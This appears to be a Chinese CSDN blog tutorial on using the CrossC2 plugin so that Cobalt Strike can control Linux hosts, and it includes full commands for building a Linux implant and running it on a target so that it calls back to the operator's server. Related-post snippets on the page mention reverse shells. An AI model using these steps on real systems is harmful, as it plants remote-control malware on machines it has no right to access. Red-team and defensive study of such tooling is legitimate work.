内网渗透—Linux上线

最新推荐文章于 2024-05-12 13:19:07 发布
最新推荐文章于 2024-05-12 13:19:07 发布
阅读量3.2k 收藏 6
点赞数 2
分类专栏: 网络安全学习 # 内网渗透 文章标签: linux CobaltStrike Linux上线
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44268918/article/details/131167574
版权

内网渗透—Linux上线

1. 前言

  默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题。

2. 下载插件

  crossC2主要面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。

  crossC2插件

  这里我们需要下载两个文件,主要其中Linux与MacOS是需要根据自己的服务器系统来判断,通常来说都是使用Linux系统。

在这里插入图片描述

3. CS配置

  这里我们首先先启动CS,这一步想必应该不需要解释吧!

3.1. 客户端配置

3.1.1. 导入插件文件

  将下载好的后缀为.cna文件导入进CS中。

在这里插入图片描述

3.1.2. 配置监听

  由于插件只支持HTTPS与TCP,所以这里我们选择的监听就选择HTTPS吧。

在这里插入图片描述

3.2. 服务端配置

3.2.1. 导入配置文件

  这里将下载下来的结尾是.Linux的文件导入到服务器中,注意需要导入到CS目录下,并赋予执行权限。

chmod +x genCrossC2.Linux

在这里插入图片描述

  这里最好的将CS客户端重启一次。

3.3. 生成木马

  当在之前加载插件后,就会出现这个CroseC2了,只不过建议,当将.Linux文件上传到服务端并添加执行权限后,最好是重启以下CS客户端。

  这里我们选择HTTPS的选项。

在这里插入图片描述

  这里相关的内容看图片上的文字,生成情况,会在会话事件日志中出现,确实这个点击生成后,并会直接像CS一样弹窗出来,而且是需要你去执行命令去生成。

  所以一般情况下可以不使用这个界面去生成,可以直接使用命令。

./genCrossC2.Linux 192.168.10.20 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

这个命令其实仔细看是能够看出来的的前面的是我们之前上传到服务端的.Linux文件,后面跟着服务器地址及监听端口。
后面./.cobaltstrike.beacon_keys 输入ls -l 能够看到隐藏文件,后面的想必不用介绍了吧。

  当然如果觉得命令麻烦,那么就是直接在下面的图片中点击生成,然后将命令复制到Linux中进行执行,因为不一定能够执行成功!!

在这里插入图片描述

3.3.1. 修改cna文件

  当你点击生成后会发现,命令无法执行?这是由于在cna文件中的配置并没有修改,看下图,还是mac的。这时候我们就需要去修改cna文件。

在这里插入图片描述

  找到cna文件,也就是之前加载的文件,修改里面的地址,地址是你cs文件夹,下面的是你的系统文件,也就是刚刚下载的.Linux文件名字,其它的是不需要修改的。

  修改后,要将CS客户端重启哦。

在这里插入图片描述

3.3.2. 修改后效果

  可以看到前后的对比,前面有相应的路径了。

在这里插入图片描述

  然后将命令输入到Linux中进行执行,当然我的建议是在cs目录下执行,去除前面的绝对路径。

./genCrossC2.Linux 192.168.10.20 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

在这里插入图片描述

3.4. 执行木马

  将木马上传到Linux系统中,然后基于执行权限,并且执行木马,从CS客户端可以看到成功上线。

chmod +x t_cc2.out
./t_cc2.out

在这里插入图片描述

剁椒鱼头没剁椒
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
cs上线linux主机
逍遥小哥的博客
01-19 741
cobaltstike默认只生成windows载荷,不能上线linux主机,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac).由于我们cs客户端是在windows生成木马,就下载win版的crossC2就行。把此文件.cobaltstrike.beacon_keys 文件放到客户端cs的文件夹里。和我上面的命令一样啊,感觉就是配了个路径的环境变量,执行起了更加方便了。这就是生成成功,会在cs客户端目录生成木马文件, 我这里生成了两个。然后把我们刚才用第二个方式生成木马文件丢上去。
解决cs不能生成Linux木马的问题
weixin_65582330的博客
03-02 626
要下载的是上面圈起来的两个就行了 ,genCrossC2的文件类型主要是看你客户端的主机是什么系统,如果你是linux就下linux,如果是windows就下win,以此类推。接下来看操作,这里我的客户端是windows,所以下载windows的。服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把这个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议。下载插件:CrossC2。
linux内网渗透技巧总结
最新发布
渗透测试研究中心
05-12 626
known_hosts格式有两种,取决于你的~/.ssh/config文件中的HashKnownHosts字段的设置,有可能是明文也有可能是一段哈希字符串。如果没有~/.ssh/config文件,这取决于/etc/ssh/ssh_config文件中的该字段。今后,当你使用 PuTTY 登录时,可以在左侧的 Connection -> SSH -> Auth 中的 Private key file for authentication: 处选择你的私钥文件,然后即可登录了,过程中只需输入密钥锁码即可。
linux cs防火墙,关于CS上线Linux主机(CrossC2)
weixin_42524499的博客
05-12 759
0x01 前言Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,...
CrossC2安装上线Linux
nextlubricate的博客
11-20 1292
下载CrossC2 https://github.com/axax002/CrossC2 将src目录复制到win10客户端cs目录下 下载插件 https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip 将genCrossC2.Linux文件上传到Linux服务
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1077
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
CrossC2-cs4.1.zip
07-24
CrossC2-cs4.1.zip
linux内网渗透1
08-03
本文主要涉及的是Linux内网渗透的相关技术与步骤,主要分为以下几个部分: 1. **漏洞利用**: 提到了Wooyun上的一个漏洞(wooyun-2015-0144595),这个漏洞是针对Glassfish应用服务器的。攻击者通过该漏洞可以读取...
agent内网渗透代理相关
04-14
内网渗透代理
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
linuxcs中文版下载,在linux下也能玩CS游戏了 呵呵~~
weixin_29337315的博客
05-06 1031
----很菜的文章,希望高手不要耻笑,有好的方法告诉我删掉windows后,唯一怀念的就是cs,一直在寻找linux下如何玩cs,几经摸索,终于装好了,可以正常的玩了;欣喜之余我便有个想法,把我自己的安装经过写出来,给朋友们一个参考。1.首先,装好wine/winex,使用mdk软件包安装程序,搜索wine,找到下列6个软件包libwine1-20040213-3mdklibwine1-capi-...
CobaltStrike上线Linux主机(CrossC2)
谢公子的博客
05-30 6955
在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,CobaltStrike能否对Linux主机进行长期远控呢? 在上一篇文章中我提到了,CobaltStrike自身上线Linux主机的情况,需要知道对方Linux主机的账号密码或SSH秘钥,并且还需要获取一台其他机器权限作为中继。本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell。 ...
使用CrossC2插件 上线Linux
Vicl1fe的博客
08-12 2026
前言 做红队的时候,就可以发现大部分服务器都是linux。而Windows的服务器比较少。还是更希望可以上线CS,方便管理。 环境 1.kali 2021 2.CS4.2 CrossC2 通过CrossC2插件可以实现上线CS。支持CS4.x版本上线,github链接如下。 https://github.com/gloxec/CrossC2/releases 我下载的是2.2.4-stable。因为我的环境是kali。所以我下载的是genCrossC2.Linux。然后再把Source code(zip
cs linux服务器ip,linux安装CS服务器详解
weixin_34135180的博客
04-29 430
下面小编给大家分享一篇linux安装CS服务器详解,感兴趣的朋友跟小编一起来了解一下吧!首先你要下载两个文件.hlds_l_3109_full.bin cs_14_full.tar.gz,接下来就是安装了,首先就是要把文件解压:chmod +x hlds_l_3109_full.bin./hlds_l_3109_full.bin这时会出现协议选项,输入"yes"就可以了,并且会解出hlds_l_3...
cs linux服务器ip,Linux:经典有些“反恐精英”服务器架设初级篇
weixin_39810901的博客
04-29 391
CS游戏也是80后的我们都几乎操练过的的一款有些,CS也就是我们常说的“Counter-Strike:反恐精英”的缩写。关于反恐精英服务器架设网上有很多资料但是,你经过验证后,发现服务器却都启动不了。这可能是因为文件不正确的原因,而很多人又都是互相转载的。关于Counter-Strike的架设,可以选择windows平台,同样可以选用linux平台,个人认为linux更方便一些,脚本可以自己书写,...
Linux与部署上线
不放手,不错过的博客
09-04 1082
1.VMware介绍 VMware是一个“虚拟pc”软件公司,提供服务器,桌面虚拟化的解决方案。它的产品可以实现在一台计算机上同时 运行两个或者更多Windows,DOS,LINUX系统。与多启动系统相比 ,VMware采用了完全不同的概念。多启动系 统在一个时刻只能运行一个系统,在系统切换时需要重启计算机。VMware可以实现真正“同时”运行,多个操作系 统在主系统平台上可以像标准windows应用程序那样切换。每个操作都可以进行虚拟分区,配置,而不影响真实硬 盘的数据,甚至可以通过虚拟网卡将几台虚拟
内网渗透 linux
08-18
Linux系统中进行内网渗透,攻击者可以利用一些常见的工具和技术来获取未授权访问、提权或控制其他主机。以下是一些常见的内网渗透技术和建议的对策: 1. 弱密码攻击:攻击者可能尝试猜测或暴力破解Linux系统上的密码。对策:确保使用强密码策略,并定期更改密码。禁用不必要的远程登录方式,如SSH密码登录,改为使用公钥身份验证。 2. 服务漏洞利用:攻击者可能利用Linux系统上运行的服务中的已知漏洞进行入侵。对策:定期更新和升级系统和软件包,及时修补已知漏洞。关闭不必要的服务或端口,只保留所需的服务,并根据需要配置防火墙规则。 3. 提权攻击:攻击者可能试图通过利用Linux系统上的特权升级漏洞来获取管理员权限。对策:限制用户的权限,确保每个用户只具有适当的权限。定期检查系统日志,监测异常行为和特权升级尝试。及时安装操作系统和内核的安全更新。 4. 社交工程:攻击者可能使用欺骗、伪装或其他手段来获取用户的敏感信息。对策:加强安全意识培训,教育员工有关社会工程学攻击的风险和防范措施。提醒用户不要随意点击可疑的链接或打开未知来源的附件。 5. 无线网络攻击:如果目标网络中有无线网络,攻击者可能尝试通过无线网络入侵内部网络。对策:使用强密码和加密协议保护无线网络。禁用不必要的无线网络功能,并配置合适的防火墙规则。 6. 内部系统扫描:攻击者可能在内网中进行系统扫描,探测其他主机的漏洞。对策:配置入侵检测系统(IDS)或入侵防御系统(IPS),监测内部网络流量,及时发现和阻止异常活动。 请注意,这些建议只是一些基本的防范措施。实际情况可能因网络环境和需求而异。为了确保Linux系统的安全,建议定期进行漏洞扫描、安全审计和渗透测试,并采取相应的安全措施来减少潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒鱼头没剁椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值